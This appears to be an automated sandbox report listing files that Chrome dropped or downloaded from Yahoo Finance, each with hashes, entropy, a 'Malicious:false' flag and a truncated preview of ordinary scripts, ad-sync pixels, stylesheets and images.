                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-bind",[],t):"object"==typeof exports?exports["wafer-bind"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-bind"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(o){if(r[o])return r[o].exports;var n=r[o]={i:o,l:!1,exports:{}};return e[o].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,o){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:o})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1734), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1734
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.602079809045733
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:jTg0n77+kFjdAUiUusyuqjuasedCKAHdq:N7pDA+fEjuafdCbdq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:77E9E4C4C8B37739466215D5C2899982
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6B0D10C70659A6BAF1E1A70A3B44A197DC8DEE4A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9FCF43CCE5B720A69329E730AF846F257FA70867FE75466156C303E18698A026
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3754EE691BDFAB02441BC7C1180C9B79708B117C046C63F0448DCFCF054273EABD2B310A08FA3B3C4875A65929C9A61C18E929FBBBBE2BF7B5F71665DB1443C3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:PubMatic.loadAsyncIframePixel('https://dis.criteo.com/dis/usersync.aspx?r=3&p=4&cp=pubmaticUS&cu=1&&gdpr=0&gdpr_consent=&url=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTE5MjgmdGw9NDMyMDA=&piggybackCookie=uid:@@CRITEO_USERID@@');PubMatic.loadAsyncIframePixel('https://cms.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?idmatch=0&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://x.bidswitch.net/sync?ssp=pubmatic&gdpr=0&gdpr_consent=&us_privacy=#US_PRIVACY');PubMatic.loadAsyncIframePixel('https://t.adx.opera.com/pub/sync?pubid=pub8730968190912');PubMatic.loadAsyncIframePixel('https://dsp-cookie.adfarm1.adition.com/?ssp=9&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://pubmatic-match.dotomi.com/match/bounce/current?networkId=17100&version=1&nuid=176682A8-E121-44A7-818D-4FE53D542BB2&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://sync.srv.stackadapt.com/sync?nid=11&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://sync-tm.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3412), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.0908215241003845
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:YozhSx5M2PjYJakqOPyGbmq1Tk0GGbLq12k0yXD0THZHL2yVLT4hk14yIJZFOtkK:3hqjg8q1Tr9q12ryw1L2UPq1ktkNCYc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:956DABF4D28930BC42D934995B814D6D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D461E2FAB9B3E6F89561FEB5C2A5CBBB26198951
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CA9998A600267DC2431ABC077F8CF7A5476A46EE1E82D0C6F12BB17E512C3FE8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6A98F3C8201E544DB161FA89E8A434B35B179F7D33446247B13EA08B43A7E79D44025524AEFDE0215827B2B2B95F8AC349712DCA00AA3073DDF2C4EE11B9F710
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-text",[],t):"object"==typeof exports?exports["wafer-text"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-text"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(o){if(r[o])return r[o].exports;var n=r[o]={i:o,l:!1,exports:{}};return e[o].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,o){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:o})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (13714), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):13714
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.23465777657958
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:3oEREi6qrvGmlR1IaKJoCmXK6Tb8JIFbXv00O8jp4f3tjf+88uLUH:4ER1XDlR1xVNXK6Tb8JknODjm88u4H
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:94D07DAA349C254B35FFCDA6E54CC754
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C46D6650E0F01C7F2977182F8FE5D5A07ABA9EE5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0291E42C6C243B4177E0331B6E3692A8E03E29A39852790CE81604A998872C68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8B3FEB7625D38BD50F22B838A14868D15EEBE1DFE6715A422B777A267585A1BAF9DE5982A29089C6BB7C0FC3DEAE8CE8B57F1BE851F78F1EECC9B625F08917CB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-form-1.34.5-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-form",[],t):"object"==typeof exports?exports["wafer-form"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-form"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r=window.webpackJsonpwafer_wafers_wafer_form;window.webpackJsonpwafer_wafers_wafer_form=function(t,n,o){for(var a,s,u=0,l=[];u<t.length;u++)s=t[u],i[s]&&l.push(i[s][0]),i[s]=0;for(a in n)Object.prototype.hasOwnProperty.call(n,a)&&(e[a]=n[a]);for(r&&r(t,n,o);l.length;)l.shift()()};var n={},i={1:0,2:0};return t.e=function(e){function r(){s.onerror=s.onload=null,clearTimeout(u);var t=i[e];0!==t&&(t&&t[1](new Error("Loading chunk "+e+" failed.")),i[e]=void 0)}var n=i[e];if(0===n)return new Promise(function(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (350)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):351
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.030618501403249
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:QHL4GbcBIsVf5clTEYGeha7XliARCef+WRcEXXNOu5qqKqi7Xla6jh+cnRRsVfO:tDQEIARHfpWEXXNxQqKqi06VF+W
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3B957BF038F502B020932376893502C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:18753D1E9900AA8A70C29444AB1D4A82857A1DC9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:307021D701C2678F8F3F496F0DEB2C1F3252B8394C422A10FE43C0F2B9015B7A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:20C0FB5947E8C4B7DCCB2A8B5E408937D9D5445908F4BF8D8E60D0EAD214726E7A595A2265EFD7B503A1DA206FB897911F65A986B8B799CA46B46D5CD0173947
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/2.DPu3nbOv.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:@layer layout{header.yf-1m8s98o{z-index:10;position:sticky;top:0}header.yf-1m8s98o #ybar-inner-wrap{position:relative!important;box-shadow:none!important}@media only screen and (max-width: 767px){header.stickyAd.yf-1m8s98o{top:calc(var(--ad-top) + var(--space-4))}}@media only screen and (min-width: 1050px){header.yf-1m8s98o{position:sticky;top:0}}}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 356x180, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):39905
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.95760961712989
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:dpoyzHDSp545k5zgq7Yw6WoQ7ldLte2P4Gge8a1E/w7yjXW7ERg/T:zqz45ygq7YlWoQ7X5e2P3gRa1EBjXW22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:1F10F3CD86B4D6B3C727304F0569CDE0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CB9794155EB8B5E85E75B664344EE6DF8167D15C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:613268F5B9B7BB8A0558C748CBF4A0DE7370C5613777B1EFFC274695262578FD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5FA53DCC361120863F20DAF0FDA212DCC710F5D23E26A3760C7C2B7E2854E63A39307DEE819C729E618CF8CEB806FBF3207422AE2BE98F70EF325D5CE62E4012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C....................................................................C.........................................................................d............................................P.........................!...."1A.Q.2a.#q...B.$%R....35Cbr...st..........&SUc..................................<.........................!.1."#A.2BQ3aq..$...4Rb..CS...%r.............?.ZP\....U.%....$...2O...>..|..5G...[.S....Y..b!2.2..W.A...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (381)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):382
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.855674076449588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:RfhHshZk875DNVuJUpIC9txhZRR8ax8JotAGZU/hZFEbvxhZOBMzC:N87tNVuJG34oa4Fbv0EC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DAC87211EAC88665F1D7CF1E60D19520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6D3424C90ED411B8CF7DDE5B6970A7D14CA01209
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0DFEB67269F57B605DE093BB32A4209EBFF6E591D367798E082F9FEDE0513378
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:CA7F0DE4C7C31461733A3E00EC4F1467780978A93646FE7FFB8ACB108F43F4A3DBF257BF967D783CEA8E8F2F6560F9B987C6313071C1D718DBFAE46061093205
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/BreadCrumb.xKBVu039.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:nav.yf-1fy603s.yf-1fy603s,ol.yf-1fy603s.yf-1fy603s{display:flex;gap:var(--space-1);list-style:none;align-items:center;flex-wrap:wrap}.back-link.yf-1fy603s.yf-1fy603s{line-height:100%}ol.yf-1fy603s li.yf-1fy603s:last-child{color:var(--enabled-l2);font-weight:var(--font-weight-bold)}.no-bb.yf-1fy603s.yf-1fy603s{border-bottom:unset}.no-bp.yf-1fy603s.yf-1fy603s{padding-bottom:unset}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://sync-pm.ads.yieldmo.com/sync?pn_id=pub&id=176682A8-E121-44A7-818D-4FE53D542BB2&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 192 x 192, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):32588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.965504626917684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:6sEiLQyPOQqzUd3SX7jSbBqt8qL3CWrmeuQwVx4lIHez:fEyP9qI1SX4n8La6wVilhz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:36C7A103DA669E7102DB2E95FA6E1AAA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2C7D65A7D8EDF0A7F34A61068C20EFAE77B6A4FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:FF21CB418590A8EC25869FDCC3F3269793097D8D1AA8981B786791AB9A74A260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F1425D51F45B5A0CD2782A9177A81D1A3266F16D452BE366FD8DD0ED15B6D2EC607438025F2F8F3783017037160F2BCE739AF5BBB7AE8AC76D8E5529E0296B4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/cv/apiv2/default/finance/favicon-192x192.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR.............R.l.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....eXIfMM.*.............................J...........R.(...........i.........Z.......H.......H................................................T.....pHYs................YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>..^....@.IDATx..}...E.....od%+$.........o...QGgF.'..(*....t.u@..QT..E.M....HH..........{...A...}..:U}.....o.....d...X.\,S7UY._.C.UiU..51.1..4Fi....J...../.E[..<...kbN.5Y...8.CM..?..k..RS...k(J..S.$u+./..d9*.k....D.V..W.9.-Sy...8..Q...i...Y...U.S...9d.+..c|<.6.|-.RL.5nOq.;....SD...-.Z...0..vF&.gl..U.;....j....>w..E|.9T.8bM.G..(_j......xY...Wm\..UZ.x..&.\....q.M
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 340x179, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):12243
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.904859826488712
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:XvMHY826dj0Z2GAKMuaIZMdUKZqlqIQDzfZGt5ULcB5U5tGfXjXSkehWu73KkBew:Xvp82evGAhRPrzhGt5uGfzXSkqWu733D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0739AAC662CE675C2297F9419EB0FDDE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BCF0C5D44936415BEA044E7AA7DA4CECB0F75806
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1556655AA25E138E557B6D3BC5C7554F9D5F57B956824CBA3E13E577CE711B49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AA4DB227F5394CA268222D4FDB729D218224AF84140F32A730D038F99D50B5C2D6C2B2577F866559F8741CAF51D8352036C9760E3511AE43D2DB69ADE748A0E7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:......JFIF.............4ICC_PROFILE......$appl....mntrRGB XYZ ........... acspAPPL....APPL...........................-appl....%..M8.......................................desc.......ecprt...d...#wtpt........rXYZ........gXYZ........bXYZ........rTRC....... chad.......,bTRC....... gTRC....... desc........Display P3..................................................................................text....Copyright Apple Inc., 2017..XYZ .......Q........XYZ ..........=.....XYZ ......J....7....XYZ ......(8.......para..........ff......Y.......[sf32.......B.......&.......................n................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||.........T.."..........5..................................................................9.b2>..U4.n.2.._.-/6.8.g';:.s.../{f?.....l.Ar.F....a.b.|....c.......q...Q7|.n^..b./..Q.i..=^...X..s.R#9..Ed|....^zR!4..8N....3.......j:....r...)...].......Y..k..p....S.:5..nn.Y."^
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1607)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.398043379864443
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:TP3/nMdHi2JBg2HF1aDVJL03P7uz3qP6US5HVarRMOJfXDmE71ACvlc+asFMRFFy:Tv/nMdHi27g2lig3P7kaFSARxt2CfFQQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:158A2A73627F010A0C7DCBE57774D5BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:57254E05F8AC89BCBD1E545FF02A8AEA7F008B34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A770123DA533A5DDEF3EFC9B8C410C41475CA160E4CB576FB1880AA591910D78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:61BE7BB582ACA02F15816F054E959EE3DE3221E7C9CD919D1F87E2BEC1373C0A99AE05A8AF413AA976C76746216BE2C6E94B120F897EA06C8D0DFA4832F5B021
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{d as y,c as L,s as O}from"./commonUtil.BWwawKjd.js";import{m as Q,n as F}from"./utils.CNaWwYSx.js";import{l as H}from"./initializePage.LkEoQoQZ.js";import{l as j}from"./logUtil.CCV3qKPL.js";const N="168x126",m=Q([N]),d={adsFrequency:5,adsImageTags:m.tags,imageTags:m.tags,spaceId:void 0,adsSectionId:void 0},f={homeNewsStream:"homeNewsStreamNeo",newsHubNewsStream:"newsHubNewsStreamNeo"};async function $(t,{isPagination:c=!1,listName:n="home-news-stream",queryRef:o="homeNewsStream",payload:S,adsEnabled:g,enableCrossModuleDedup:l=!1,offset:I=0,...p}={}){var w;const[r,[u,e,A,h]]=await Promise.all([y(t),L(["config","ncpStreams","crumb","ads"],t)]),{enableIncreaseAdsTimeout:P,i13n:T,ads:v={}}=u.getPageConfig()??{},{spaceid:E}=T||{},{adsSectionId:z}=v||{},C=O(r,"enableNeoNCPQuery"),M=!!((w=h.getConfig(r.device))!=null&&w.enableTaboolaAds);o=C&&f[o]?f[o]:o,d.spaceId=E,d.adsSectionId=z;const s=n,_={adsEnabled:g!==void 0?g:!A.isAdLite,adsSlotsEnabled:M,key:"ncp_fin",...d,listName:n,perfLab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5070)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5071
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.154279591983011
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:yCCs0XQaOSvruAe49pph485P1z9N8fxuOh7Snxqqcp3Dr:KzjrPeqrhBWGD+Dr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4B4CAA230C1D0883BB6B688B56177440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6E7835E19976DE3C78B4DA88D688A9B4BB25E3DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E197B1B3E813A5D2282D5AA19FFEC0CCF1B4F62C0B09BEE72B4B31FBC58CDEA4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:75EFF1EA2F3EEC2CA7258AB4853AF8F26AA82CBB6B1226C3EF97BC8A7AF61D6BD1DCD9460E593F20AC15A11E6183B35A609C7C44AC4606A18D44CA2DA45BE5D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/a11y-dialog.esm.BnYZCIGX.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var m=Object.defineProperty;var p=(e,t,i)=>t in e?m(e,t,{enumerable:!0,configurable:!0,writable:!0,value:i}):e[t]=i;var r=(e,t,i)=>(p(e,typeof t!="symbol"?t+"":t,i),i);const n={inert:":not([inert]):not([inert] *)",negTabIndex:':not([tabindex^="-"])',disabled:":not(:disabled)"};var E=[`a[href]${n.inert}${n.negTabIndex}`,`area[href]${n.inert}${n.negTabIndex}`,`input:not([type="hidden"]):not([type="radio"])${n.inert}${n.negTabIndex}${n.disabled}`,`input[type="radio"]${n.inert}${n.negTabIndex}${n.disabled}`,`select${n.inert}${n.negTabIndex}${n.disabled}`,`textarea${n.inert}${n.negTabIndex}${n.disabled}`,`button${n.inert}${n.negTabIndex}${n.disabled}`,`details${n.inert} > summary:first-of-type${n.negTabIndex}`,`iframe${n.inert}${n.negTabIndex}`,`audio[controls]${n.inert}${n.negTabIndex}`,`video[controls]${n.inert}${n.negTabIndex}`,`[contenteditable]${n.inert}${n.negTabIndex}`,`[tabindex]${n.inert}${n.negTabIndex}`];function h(e){(e.querySelector("[autofocus]")||e).focus()}function y(e){cons
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (15896), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
